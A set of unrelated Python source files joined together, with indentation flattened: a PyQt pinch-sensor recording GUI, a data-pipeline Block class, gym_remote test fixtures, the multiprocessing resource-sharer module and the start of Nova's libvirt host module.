file.close()
self.message_box("file_saved", name)
full_recordings[current_recording-1][4] = True
except IOError:
self.message_box("file_error", name)
def file_save_all(self):
for is_saved in full_recordings:
if not is_saved[4]:
break
else:
self.message_box("files_saved_already", '')
return
name = self.lineFileName.text()[:-4]
while os.path.exists(name):
name = name + "_2"
name = QtWidgets.QFileDialog.getSaveFileName(QtWidgets.QFileDialog(), caption="Save all recordings",
directory=os.path.join(os.getcwd(), name))
if name[0]:
self.lineFileName.setText(os.path.split(name[0])[1])
self.lineFileName.setFocus(True)
self.update_file_name()
self.labelFileNameFirst.setText(self.labelFileNameFirst.text() + ".txt")
name = self.lineFileName.text()
if os.path.exists(name):
name = name + "_2"
os.mkdir(name)
for index, recording in enumerate(full_recordings):
try:
file = open(os.path.join(name, name + "_%d.txt" % (index+1)), 'w')
date_time = recording[3]
file.write("#Data collection started on %s\n" % date_time[2:-2])
file.write("#[Time] [Voltage] [Trigger]\n")
for i in range(len(recording[0])):
time_sample = recording[0][i]
voltage_sample = recording[1][i]
trigger_sample = recording[2][i]
file.write("%.3f %.3f %d\n" % (time_sample, voltage_sample, trigger_sample))
file.close()
full_recordings[index][4] = True
except IOError:
self.message_box("file_error", name + "_%d.txt" % (index+1))
break
else:
self.message_box("files_saved", name)
class GraphWidget(QtGui.QWidget):
def __init__(self, parent=None):
super(GraphWidget, self).__init__()
layout = QtGui.QHBoxLayout()
self.plotView = pg.PlotWidget()
layout.addWidget(self.plotView)
self.setLayout(layout)
class LineEdit(QtWidgets.QLineEdit):
def focusInEvent(self, event):
if self.text() == "pinchsensor_recording.txt":
self.clear()
self.selectAll()
QtWidgets.QLineEdit.focusInEvent(self, event)
def focusOutEvent(self, event):
if self.text() == "":
self.setText("pinchsensor_recording.txt")
if self.text()[-4:] != ".txt":
self.setText(self.text() + ".txt")
QtWidgets.QLineEdit.focusOutEvent(self, event)
class MainWindow(QtWidgets.QMainWindow):
def closeEvent(self, event):
if current_recording:
all_save = False
current_save = full_recordings[current_recording-1][4]
for is_saved in full_recordings:
if not is_saved[4]:
break
else:
all_save = True
closeBox = QtWidgets.QMessageBox()
closeBox.setWindowTitle("Quit")
closeBox.setIcon(1)
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
if not current_recording:
closeBox.setText("Are you sure you want to quit?")
elif current_save:
closeBox.setText("Last recording WAS saved.\nAre you sure you want to quit?")
if current_recording > 1:
if all_save:
closeBox.setText("All recordings were saved.\nAre you sure you want to quit?")
else:
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No |
QtWidgets.QMessageBox.SaveAll)
else:
closeBox.setText("Last recording was NOT saved.\nAre you sure you want to quit?")
if current_recording > 1:
if all_save:
closeBox.setText("All recordings were saved.\nAre you sure you want to quit?")
else:
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No |
QtWidgets.QMessageBox.SaveAll | QtWidgets.QMessageBox.Save)
else:
closeBox.setStandardButtons(QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No |
QtWidgets.QMessageBox.Save)
closeBox.setDefaultButton(QtWidgets.QMessageBox.No)
choice = closeBox.exec()
if choice == QtWidgets.QMessageBox.Yes:
global stop_plot
stop_plot = True
if ser.is_open:
ser.close()
ser.open()
ser.close()
event.accept()
if choice == QtWidgets.QMessageBox.Save:
ui.file_save_current()
event.ignore()
self.closeEvent(event)
if choice == QtWidgets.QMessageBox.SaveAll:
ui.file_save_all()
event.ignore()
self.closeEvent(event)
if choice == QtWidgets.QMessageBox.No:
event.ignore()
class SuddenDisconnect(QtWidgets.QWidget):
signal = QtCore.pyqtSignal()
class COMThread(QtCore.QThread):
def __init__(self):
QtCore.QThread.__init__(self)
def __del__(self):
self.wait()
def run(self):
ui.refresh_com()
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
app.setStyle('Fusion')
pinchSensorUI = MainWindow()
ui = Ui_pinchSensorUI()
pinchSensorUI.show()
sys.exit(app.exec_())
# TODO connection assistant
|
block.py
|
import time
import threading
import warnings
from contextlib import contextmanager
import remoteobj
import reip
from reip.stores import Producer
from reip.util import text, Meta
'''
'''
__all__ = ['Block']
class _BlockSinkView:
'''This is so that we can select a subview of a block's sinks. This is similar
    in principle to numpy views. The alternative is to store the state on the original
object, but that would have unintended consequences if someone tried to create two
different views from the same block.
'''
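    # e.g. block[0] or block[:2] (via Block.__getitem__) returns one of these views,
    # which can then be piped onward with .to(...) just like the block itself.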
def __init__(self, block, idx):
self._block = block
self._index = idx
@property
def item(self): # can be a single sink, or multiple i.e. block[0] or block[:2]
return self._block.sinks[self._index]
@property
def items(self): # always a list
return reip.util.as_list(self.item)
def __iter__(self): # iterate over sink
return iter(self.items)
def __getitem__(self, key): # get sub index
return self.items[key]
def to(self, *others, squeeze=True, **kw):
        '''Connect this block's sinks to other blocks' sources.
.. code-block:: python
InputBlock().to(ProcessBlock())
'''
outs = [other(self.items, **kw) for other in others]
return outs[0] if squeeze and len(outs) == 1 else outs
def output_stream(self, strategy='all', source_strategy=all, **kw):
'''Create a Stream iterator which will let you iterate over the
outputs of a block.'''
return reip.Stream([s.gen_source(strategy=strategy, **kw) for s in self.items], strategy=source_strategy, **kw)
class Block:
'''This is the base instance of a block.
Arguments:
queue (int): the maximum queue length.
n_inputs (int, or None): the number of sources to expect. If None,
it will accept a variable number of sources.
n_outputs (int): the number of sinks to expect.
- If `n_outputs=0`, then there will be a single sink, that outputs no
buffer value, but does output metadata.
e.g.
```python
# block 1
return {'just some metadata': True}
# or
return [], {'just some metadata': True}
# block 2
def process(self, meta): # no buffer value
assert meta['just some metadata'] == True
```
- If `n_outputs=None`, then the block will have no sinks.
blocking (bool): should the block wait for sinks to have a free space
before processing more items?
max_rate (int): the maximum number of iterations per second. If the block
processes items any faster, it will throttle and sleep the required
amount of time to meet that requirement.
e.g. if max_rate=5, then an iteration will take at minimum 0.2s.
graph (reip.Graph, reip.Task, or False): the graph instance to be added to.
        name (str): the name of this block. If not given, a unique name is generated
            from the class name and the instance id.
'''
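    # Hedged usage sketch (block names are illustrative, and whether Graph exposes
    # run() exactly like this is an assumption; the pipe syntax itself is defined by
    # __or__/__ror__ below):
    #
    #   with reip.Graph() as g:
    #       SomeSource() | SomeProcessor()
    #   g.run()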
_thread = None
_stream = None
_delay = 1e-4
parent_id, task_id = None, None
started = ready = done = closed = _terminated = False
processed = 0
controlling = False
max_rate = None
def __init__(self, n_inputs=1, n_outputs=1, queue=100, blocking=False, print_summary=True,
max_rate=None, min_interval=None, max_processed=None, graph=None, name=None,
source_strategy=all, extra_kw=True, extra_meta=None, log_level=None,
handlers=None, modifiers=None, input_modifiers=None, **kw):
self._except = remoteobj.LocalExcept(raises=True)
self.name = name or f'{self.__class__.__name__}_{id(self)}'
self.parent_id, self.task_id = reip.Graph.register_instance(self, graph)
self._print_summary = print_summary
# sources and sinks
# by default, a block takes a variable number of sources.
# If a block has a fixed number of sources, you can specify that
# and it will throw an exception when spawning if the number of
# sources does not match.
self._block_sink_queue_length = queue # needed for set sink count
self.n_expected_sources = n_inputs
self.sources, self.sinks = [], []
self.set_block_source_count(n_inputs)
self.set_block_sink_count(n_outputs)
# used in Stream class. Can be all(), any() e.g. source_strategy=all
self._source_strategy = source_strategy
# handlers are wrapper functions that can do things like catch errors and restart when a block is closing.
self.handlers = reip.util.as_list(handlers or [])
# modifiers are functions that can be used to alter the output of the block before they are
# sent to a sink
self.modifiers = reip.util.as_list(modifiers or [])
self.input_modifiers = reip.util.as_list(input_modifiers or [])
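        # Based on how _main wires them up, each handler is called as
        # handler(block, run) and decides if and when to invoke run().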
if min_interval and max_rate:
warnings.warn((
'Both max_rate ({}) and min_interval ({}) are set, but are '
                'mutually exclusive (max_rate=1/min_interval). min_interval will '
'be used.').format(max_rate, min_interval))
if max_rate:
self.max_rate = max_rate
if min_interval:
self.min_interval = min_interval
self.max_processed = max_processed
self._put_blocking = blocking
self._extra_meta = reip.util.as_list(extra_meta or [])
if self._extra_meta:
# this will flatten a list of dicts into a single dict. Since call=False,
# if there is a list of dictionaries and a function, any dictionaries
# before the function will be collapsed, and any after will be left.
# Calling again (without call=False), will evaluate fully and return
# the a flattened dict.
self._extra_meta = reip.util.mergedict(self._extra_meta, call=False)
if extra_kw:
self.extra_kw = kw
for key, value in kw.items():
setattr(self, key, value)
elif kw:
raise TypeError('{} received {} unexpected keyword arguments: {}.'.format(
self, len(kw), set(kw)))
# block timer
self._sw = reip.util.Stopwatch(self.name)
self.log = reip.util.logging.getLogger(self, level=log_level)
# signals
self._reset_state()
@property
def min_interval(self):
return self.max_rate
@min_interval.setter
def min_interval(self, value):
self.max_rate = 1. / value if value is not None else value
def set_block_source_count(self, n):
# NOTE: if n is -1, no resize will happen
self.sources = reip.util.resize_list(self.sources, n, None)
def set_block_sink_count(self, n):
# NOTE: if n is None, no resize will happen
new_sink = lambda: Producer(self._block_sink_queue_length, task_id=self.task_id)
self.sinks = reip.util.resize_list(self.sinks, n, new_sink)
def _reset_state(self):
# state
self.started = False
self.ready = False
self.done = False
self.closed = False
self._terminated = False
# stats
self.processed = 0
self.old_processed = 0
self.old_time = time.time()
self._sw.reset()
self._except.clear()
def __repr__(self):
return 'Block({}): ({}/{} in, {} out; {} processed) - {}'.format(
self.name, sum(s is not None for s in self.sources),
self.n_expected_sources,
len(self.sinks), self.processed,
self.block_state_name)
@property
def block_state_name(self):
return (
(type(self._exception).__name__
if self._exception is not None else 'error') if self.error else
('terminated' if self.terminated else 'done') if self.done else
('running' if self.running else 'paused') if self.ready else
'started' if self.started else '--' # ??
) # add "uptime 35.4s"
# Graph definition
def __call__(self, *others, index=0, **kw):
        '''Connect other blocks' sinks to this block's sources.
If the blocks have multiple sinks, they will be passed as additional
inputs.
.. code-block:: python
ProcessBlock()(InputBlock())
'''
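        # index == -1 means "use the first unconnected (None) source slot",
        # falling back to appending at the end; otherwise start at the given index.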
j = next(
(i for i, s in enumerate(self.sources) if s is None), len(self.sources)
) if index == -1 else index
for i, other in enumerate(others):
# permit argument to be a block
# permit argument to be a sink or a list of sinks
if isinstance(other, Block):
sinks = other.sinks
elif isinstance(other, _BlockSinkView):
sinks = other.items
else:
sinks = reip.util.as_list(other)
if sinks:
# make sure the list is long enough
self.set_block_source_count(j + len(sinks))
# create and add the source
for j, sink in enumerate(sinks, j):
self.sources[j] = sink.gen_source(
task_id=self.task_id, **kw)
j += 1 # need to increment cursor so we don't repeat last index
return self
def to(self, *others, squeeze=True, **kw):
        '''Connect this block's sinks to other blocks' sources.
.. code-block:: python
InputBlock().to(ProcessBlock())
'''
outs = [other(self, **kw) for other in others]
return outs[0] if squeeze and len(outs) == 1 else outs
def __or__(self, other):
'''Connect blocks using Unix pipe syntax.
.. code-block:: python
InputBlock() | ProcessBlock()
'''
return self.to(*reip.util.as_list(other))
def __ror__(self, other):
'''Connect blocks using Unix pipe syntax. See :meth:`__or__`'''
return self(*reip.util.as_list(other))
def output_stream(self, **kw):
'''Create a Stream iterator which will let you iterate over the
outputs of a block.'''
return reip.Stream.from_block(self, **kw)
def __getitem__(self, key):
return _BlockSinkView(self, key)
# User Interface
def init(self):
'''Initialize the block.'''
def process(self, *xs, meta=None):
'''Process data.'''
return xs, meta
def finish(self):
'''Cleanup.'''
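    # A typical subclass overrides these three hooks. Illustrative sketch only
    # (the Scale block below is hypothetical):
    #
    #   class Scale(Block):
    #       def __init__(self, factor=2, **kw):
    #           super().__init__(n_inputs=1, n_outputs=1, **kw)
    #           self.factor = factor
    #       def process(self, x, meta=None):
    #           return [x * self.factor], meta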
# main process loop
# TODO common worker class
def run(self, duration=None, **kw):
with self.run_scope(**kw):
self.wait(duration)
@contextmanager
def run_scope(self, raise_exc=True):
try:
self.spawn()
yield self
except KeyboardInterrupt:
self.terminate()
finally:
self.join(raise_exc=raise_exc)
def wait(self, duration=None):
for _ in reip.util.iters.timed(reip.util.iters.sleep_loop(self._delay), duration):
if self.done or self.error:
return True
def _main(self, _ready_flag=None, duration=None):
'''The main thread target function. Handles uncaught exceptions and
generic Block context management.'''
try:
self.started = True
self.closed = False
self.log.debug(text.blue('Starting...'))
time.sleep(self._delay)
with self._sw(), self._except(raises=False):
# create a stream from sources with a custom control loop
self._stream = reip.Stream.from_block_sources(
self, name=self.name, _sw=self._sw,
strategy=self._source_strategy)
# self.__first_time = True
# this lets us wrap the block's run function with retry loops, error suppression and
# whatever else might be useful
run = reip.util.partial(self.__main_run, _ready_flag=_ready_flag, duration=duration)
for wrapper in self.handlers[::-1]:
run = reip.util.partial(wrapper, self, run)
run()
finally:
try:
# propagate stream signals to sinks e.g. CLOSE
if self._stream.signal is not None:
self._send_sink_signal(self._stream.signal)
finally:
self.done = True
self.started = False
self.closed = True
self.log.debug(text.green('Done.'))
def __main_run(self, _ready_flag=None, duration=None):
# # This is to return from a retry loop that doesn't want to close
# if not self.__first_time and self.closed:
# return
# self.__first_time = False
try:
with self._stream:
self._sw.tick() # offset time delay due to the reip initialization (e.g. plasma store warm-up)
# block initialization
with self._sw('init'): #, self._except('init')
self.init()
self.ready = True
self.log.debug(text.green('Ready.'))
if _ready_flag is not None:
with self._sw('wait'):
_ready_flag.wait()
# the loop
loop = reip.util.iters.throttled(
reip.util.iters.timed(reip.util.iters.loop(), duration),
self.max_rate, delay=self._delay)
self.old_time = time.time() # offset self.init() time delay for proper immediate speed calculation
for _ in self._sw.iter(loop, 'sleep'):
inputs = self._stream.get()
if inputs is None:
break
# process each input batch
with self._sw('process'): #, self._except('process')
buffers, meta = inputs
if self._extra_meta:
meta.maps += reip.util.flatten(self._extra_meta, call=True, meta=meta)
for func in self.input_modifiers:
buffers, meta = func(*buffers, meta=meta)
outputs = self.process(*buffers, meta=meta)
for func in self.modifiers:
outputs = func(outputs)
                        # This block of code needs to be here, or else self.processed would not count calls to the self.process() function
                        # but buffers generated by the current block, and thus self.processed would be zero or inaccurate in a number of cases:
                        # (i) a black-hole block that only consumes data, (ii) a data-source block that has built-in buffer bundling/grouping capabilities.
                        # We can always add another self.generated counter if we need/want to.
self.processed += 1
# limit the number of blocks
if self.max_processed and self.processed >= self.max_processed:
self.close(propagate=True)
# send each output batch to the sinks
with self._sw('sink'):
self.__send_to_sinks(outputs, meta)
except KeyboardInterrupt as e:
self.log.info(text.yellow('Interrupting'))
self.log.exception(e)
# reip.util.print_stack('Interrupted here')
except Exception as e:
self.log.exception(e)
raise
finally:
self.ready = False
# finish up and shut down
self.log.debug(text.yellow('Finishing...'))
with self._sw('finish'): # , self._except('finish', raises=False)
self.finish()
def __send_to_sinks(self, outputs, meta_in=None):
'''Send the outputs to the sink.'''
source_signals = [None]*len(self.sources)
# retry all sources
for outs in outputs if reip.util.is_iter(outputs) else (outputs,):
if outs == reip.RETRY:
source_signals = [reip.RETRY]*len(self.sources)
elif outs == reip.CLOSE:
self.close(propagate=True)
elif outs == reip.TERMINATE:
self.terminate(propagate=True)
# increment sources but don't have any outputs to send
elif outs is None:
pass
# self._stream.next()
# increment sources and send outputs
else:
# See self.__main_run()
# self.processed += 1
# # limit the number of blocks
# if self.max_processed and self.processed >= self.max_processed:
# self.close(propagate=True)
# detect signals meant for the source
if self.sources:
if outs is not None and any(any(t.check(o) for t in reip.SOURCE_TOKENS) for o in outs):
# check signal values
if len(outputs) > len(self.sources):
raise RuntimeError(
'Too many signals for sources in {}. Got {}, expected a maximum of {}.'.format(
self, len(outputs), len(self.sources)))
for i, o in enumerate(outs):
if o is not None:
source_signals[i] = o
continue
# convert outputs to a consistent format
outs, meta = prepare_output(outs, input_meta=meta_in)
# pass to sinks
for sink, out in zip(self.sinks, outs):
if sink is not None:
sink.put((out, meta), self._put_blocking)
# increment sources
# self._stream.next()
for src, sig in zip(self.sources, source_signals):
if sig is reip.RETRY:
pass
else:
src.next()
def _send_sink_signal(self, signal, block=True, meta=None):
'''Emit a signal to all sinks.'''
self.log.debug(text.yellow(text.l_('sending', signal)))
for sink in self.sinks:
if sink is not None:
sink.put((signal, meta or {}), block=block)
# Thread management
def spawn(self, wait=True, _controlling=True, _ready_flag=None):
'''Spawn the block thread'''
try:
self.controlling = _controlling
self.log.debug(text.blue('Spawning...'))
# print(self.summary())
self._check_source_connections()
# spawn any sinks that need it
for s in self.sinks:
if hasattr(s, 'spawn'):
s.spawn()
self._reset_state()
self.resume()
self._thread = remoteobj.util.thread(self._main, _ready_flag=_ready_flag, daemon_=True, raises_=False)
# threading.Thread(target=self._main, kwargs={'_ready_flag': _ready_flag}, daemon=True)
self._thread.start()
if wait:
self.wait_until_ready()
if self.controlling:
self.raise_exception()
finally:
# thread didn't start ??
if self._thread is None or not self._thread.is_alive():
self.done = True
def _check_source_connections(self):
'''Check if there are too many sources for this block.'''
# check for any empty sources
disconnected = [i for i, s in enumerate(self.sources) if s is None]
if disconnected:
raise RuntimeError(f"Sources {disconnected} in {self} not connected.")
# check for exact source count
if (self.n_expected_sources is not None and self.n_expected_sources != -1
and len(self.sources) != self.n_expected_sources):
raise RuntimeError(
f'Expected {self.n_expected_sources} sources '
f'in {self}. Found {len(self.sources)}.')
def remove_extra_sources(self, n=None):
n = n or self.n_expected_sources
if n is not None and n != -1:
self.sources = self.sources[:n]
def wait_until_ready(self):
'''Wait until the block is initialized.'''
while not self.ready and not self.error and not self.done:
time.sleep(self._delay)
def join(self, close=True, terminate=False, raise_exc=None, timeout=None):
# close stream
if close:
self.close()
if terminate:
self.terminate()
# join any sinks that need it
for s in self.sinks:
if hasattr(s, 'join'):
s.join()
# close thread
if self._thread is not None:
self._thread.join(timeout=timeout)
if (self.controlling if raise_exc is None else raise_exc):
self.raise_exception()
if self._print_summary: # print now or part of the stats will be lost if the block is used inside of Task
print(self.stats_summary())
def raise_exception(self):
self._except.raise_any()
def log_exception(self):
for e in self._except.all():
self.log.exception(e)
@property
def _exception(self):
return self._except.last
@property
def all_exceptions(self):
return self._except.all()
def __export_state__(self):
return {
'_sw': self._sw,
'started': self.started, 'ready': self.ready,
'done': self.done, #'error': self.error,
'terminated': self.terminated,
# '_stream.terminated': self._stream.terminated,
# '_stream.should_wait': self._stream.should_wait,
# '_stream.running': self._stream.running,
'_except': self._except,
}
def __import_state__(self, state):
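        # state keys may be dotted attribute paths (e.g. 'a.b'); a leading '!'
        # is stripped before the path is resolved.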
for k, v in state.items():
try:
x, ks = self, k.lstrip('!').split('.')
for ki in ks[:-1]:
x = getattr(x, ki)
setattr(x, ks[-1], v)
except AttributeError:
raise AttributeError('Could not set attribute {} = {}'.format(k, v))
# State management
def pause(self):
if self._stream is not None:
self._stream.pause()
def resume(self):
if self._stream is not None:
self._stream.resume()
def close(self, propagate=False):
if self._stream is not None:
self._stream.close()
self.closed = True
if propagate:
self._send_sink_signal(reip.CLOSE)
def terminate(self, propagate=False):
if self._stream is not None:
self._stream.terminate()
if propagate:
self._send_sink_signal(reip.TERMINATE)
@property
def error(self):
return self._exception is not None
# XXX: this is temporary. idk how to elegantly handle this
@property
def running(self):
return self._stream.running if self._stream is not None else False
# @property
# def closed(self):
# return self._stream.should_wait if self._stream is not None else True
@property
def terminated(self):
return self._terminated or (self._stream.terminated if self._stream is not None else False)
@terminated.setter
def terminated(self, value):
self._terminated = value
# debug
def short_str(self):
return '[B({})[{}/{}]({})]'.format(
self.name, len(self.sources), len(self.sinks),
self.block_state_name)
def stats(self):
total_time = self._sw.stats().sum if '' in self._sw else 0
init_time = self._sw.stats("init").sum if 'init' in self._sw else 0
finish_time = self._sw.stats("finish").sum if 'finish' in self._sw else 0
return {
'name': self.name,
'total_time': total_time,
'processed': self.processed,
'speed': self.processed / (total_time - init_time - finish_time) if total_time else 0,
'dropped': [getattr(s, "dropped", None) for s in self.sinks],
'skipped': [getattr(s, "skipped", None) for s in self.sources],
'n_in_sources': [len(s) if s is not None else None for s in self.sources],
'n_in_sinks': [len(s) if s is not None else None for s in self.sinks],
'sw': self._sw,
'exception': self._exception,
'all_exceptions': self._except._groups,
}
def summary(self):
return text.block_text(
text.green(str(self)),
'Sources:',
text.indent(text.b_(*(f'- {s}' for s in self.sources)) or None, w=4)[2:],
'',
'Sinks:',
text.indent(text.b_(*(f'- {s}' for s in self.sinks)) or None, w=4)[2:],
ch=text.blue('*'), n=40,
)
def status(self):
'''
e.g. `Block_123 + 2 buffers (2.09 x/s), 9 total (1.47 x/s avg), sources=[1], sinks=[0]`
'''
n = self.processed
total_time = self._sw.elapsed()
init_time = self._sw.stats("init").sum if 'init' in self._sw else 0
speed_avg = n / (total_time - init_time)
n_new = n - self.old_processed
speed_now = n_new / (time.time() - self.old_time)
self.old_processed, self.old_time = n, time.time()
n_src = [len(s) for s in self.sources]
n_snk = [len(s) for s in self.sinks]
return f'{self.name}\t + {n_new:3} buffers ({speed_now:,.2f} x/s), {n:5} total ({speed_avg:,.2f} x/s avg), sources={n_src}, sinks={n_snk}'
def stats_summary(self):
stats = self.stats()
# return text.block_text(
return text.b_(
# block title
'\nStats for {summary_banner}',
# any exception, if one was raised.
text.red('({}) {}'.format(type(self._exception).__name__, self._exception))
if self._exception else None,
# basic stats
'Processed {processed} buffers in {total_time:.2f} sec. ({speed:.2f} x/s)',
'Dropped: {dropped} Skipped: {skipped} Left in Queue: in={n_in_sources} out={n_in_sinks}',
# timing info
# self._sw, ch=text.blue('*')).format(
self._sw).format(
summary_banner=text.red(self) if self.error else text.green(self),
**stats)
# def print_stats(self):
# print(self.stats_summary())
def prepare_output(outputs, input_meta=None, expected_length=None):
'''Take the inputs from block.process and prepare to be passed to block.sinks.'''
if not outputs:
return (), {}
bufs, meta = None, None
if isinstance(outputs, tuple):
if len(outputs) == 2:
bufs, meta = outputs
elif isinstance(outputs, (Meta, dict)):
meta = outputs
bufs = list(bufs) if bufs else []
if expected_length: # pad outputs with blank values
bufs.extend((reip.BLANK,) * max(0, expected_length - len(bufs)))
if input_meta: # merge meta as a new layer
        if isinstance(meta, Meta):  # only if the user did not wish to override it
meta = Meta(meta, input_meta)
else:
meta = Meta(meta)
return bufs, meta or Meta()
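# Rough illustration of the shapes prepare_output accepts (how the meta is
# wrapped/merged into a Meta depends on whether input_meta is given):
#   prepare_output(([buf], {'sr': 48000}))  # -> ([buf], meta)
#   prepare_output({'sr': 48000})           # -> ([], meta)
#   prepare_output(None)                    # -> ((), {})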
|
__init__.py
|
import multiprocessing
import pytest
import tempfile
from gym_remote.client import RemoteEnv
from gym_remote.server import RemoteEnvWrapper
@pytest.fixture(scope='function')
def tempdir():
with tempfile.TemporaryDirectory() as dir:
yield dir
@pytest.fixture(scope='function')
def process_wrapper():
with tempfile.TemporaryDirectory() as dir:
def serve(pipe):
make_env = pipe.recv()
env = RemoteEnvWrapper(make_env(), dir)
pipe.send('ok')
args = pipe.recv()
kwargs = pipe.recv()
env.serve(*args, **kwargs)
parent_pipe, child_pipe = multiprocessing.Pipe()
proc = multiprocessing.Process(target=serve, args=(child_pipe,))
proc.start()
def call(env, *args, **kwargs):
parent_pipe.send(env)
assert parent_pipe.recv() == 'ok'
parent_pipe.send(args)
parent_pipe.send(kwargs)
return RemoteEnv(dir)
yield call
proc.terminate()
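# Illustrative usage (sketch; make_my_env is a hypothetical zero-argument
# factory returning a gym.Env):
#   def test_roundtrip(process_wrapper):
#       env = process_wrapper(make_my_env)
#       env.reset()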
|
resource_sharer.py
|
#
# We use a background thread for sharing fds on Unix, and for sharing sockets on
# Windows.
#
# A client which wants to pickle a resource registers it with the resource
# sharer and gets an identifier in return. The unpickling process connects
# to the resource sharer, sends the identifier and its pid, and then receives
# the resource.
#
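# Illustrative flow (sketch) for the Unix case:
#   dup = DupFd(fd)          # sending side: registers the fd, gets an id
#   ...pickle/transfer dup to another process...
#   new_fd = dup.detach()    # receiving side: connects back and receives the fd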
import os
import signal
import socket
import sys
import threading
from . import process
from .context import reduction
from . import util
__all__ = ['stop']
if sys.platform == 'win32':
__all__ += ['DupSocket']
class DupSocket(object):
'''Picklable wrapper for a socket.'''
def __init__(self, sock):
new_sock = sock.dup()
def send(conn, pid):
share = new_sock.share(pid)
conn.send_bytes(share)
self._id = _resource_sharer.register(send, new_sock.close)
def detach(self):
'''Get the socket. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
share = conn.recv_bytes()
return socket.fromshare(share)
else:
__all__ += ['DupFd']
class DupFd(object):
'''Wrapper for fd which can be used at any time.'''
def __init__(self, fd):
new_fd = os.dup(fd)
def send(conn, pid):
reduction.send_handle(conn, new_fd, pid)
def close():
os.close(new_fd)
self._id = _resource_sharer.register(send, close)
def detach(self):
'''Get the fd. This should only be called once.'''
with _resource_sharer.get_connection(self._id) as conn:
return reduction.recv_handle(conn)
class _ResourceSharer(object):
'''Manager for resources using background thread.'''
def __init__(self):
self._key = 0
self._cache = {}
self._old_locks = []
self._lock = threading.Lock()
self._listener = None
self._address = None
self._thread = None
util.register_after_fork(self, _ResourceSharer._afterfork)
def register(self, send, close):
'''Register resource, returning an identifier.'''
with self._lock:
if self._address is None:
self._start()
self._key += 1
self._cache[self._key] = (send, close)
return (self._address, self._key)
@staticmethod
def get_connection(ident):
'''Return connection from which to receive identified resource.'''
from .connection import Client
address, key = ident
c = Client(address, authkey=process.current_process().authkey)
c.send((key, os.getpid()))
return c
def stop(self, timeout=None):
'''Stop the background thread and clear registered resources.'''
from .connection import Client
with self._lock:
if self._address is not None:
c = Client(self._address,
authkey=process.current_process().authkey)
c.send(None)
c.close()
self._thread.join(timeout)
if self._thread.is_alive():
util.sub_warning('_ResourceSharer thread did '
'not stop when asked')
self._listener.close()
self._thread = None
self._address = None
self._listener = None
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
def _afterfork(self):
for key, (send, close) in self._cache.items():
close()
self._cache.clear()
# If self._lock was locked at the time of the fork, it may be broken
# -- see issue 6721. Replace it without letting it be gc'ed.
self._old_locks.append(self._lock)
self._lock = threading.Lock()
if self._listener is not None:
self._listener.close()
self._listener = None
self._address = None
self._thread = None
def _start(self):
from .connection import Listener
assert self._listener is None, "Already have Listener"
util.debug('starting listener and thread for sending handles')
self._listener = Listener(authkey=process.current_process().authkey)
self._address = self._listener.address
t = threading.Thread(target=self._serve)
t.daemon = True
t.start()
self._thread = t
def _serve(self):
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, signal.valid_signals())
while 1:
try:
with self._listener.accept() as conn:
msg = conn.recv()
if msg is None:
break
key, destination_pid = msg
send, close = self._cache.pop(key)
try:
send(conn, destination_pid)
finally:
close()
except:
if not util.is_exiting():
sys.excepthook(*sys.exc_info())
_resource_sharer = _ResourceSharer()
stop = _resource_sharer.stop
|
host.py
|
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
import operator
import os
import socket
import sys
import threading
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.i18n import _LI
from nova.i18n import _LW
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = cfg.CONF
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
class DomainJobInfo(object):
"""Information about libvirt background jobs
This class encapsulates information about libvirt
background jobs. It provides a mapping from either
the old virDomainGetJobInfo API which returned a
fixed list of fields, or the modern virDomainGetJobStats
which returns an extendable dict of fields.
"""
_have_job_stats = True
def __init__(self, **kwargs):
self.type = kwargs.get("type", libvirt.VIR_DOMAIN_JOB_NONE)
self.time_elapsed = kwargs.get("time_elapsed", 0)
self.time_remaining = kwargs.get("time_remaining", 0)
self.downtime = kwargs.get("downtime", 0)
self.setup_time = kwargs.get("setup_time", 0)
self.data_total = kwargs.get("data_total", 0)
self.data_processed = kwargs.get("data_processed", 0)
self.data_remaining = kwargs.get("data_remaining", 0)
self.memory_total = kwargs.get("memory_total", 0)
self.memory_processed = kwargs.get("memory_processed", 0)
self.memory_remaining = kwargs.get("memory_remaining", 0)
self.memory_constant = kwargs.get("memory_constant", 0)
self.memory_normal = kwargs.get("memory_normal", 0)
self.memory_normal_bytes = kwargs.get("memory_normal_bytes", 0)
self.memory_bps = kwargs.get("memory_bps", 0)
self.disk_total = kwargs.get("disk_total", 0)
self.disk_processed = kwargs.get("disk_processed", 0)
self.disk_remaining = kwargs.get("disk_remaining", 0)
self.disk_bps = kwargs.get("disk_bps", 0)
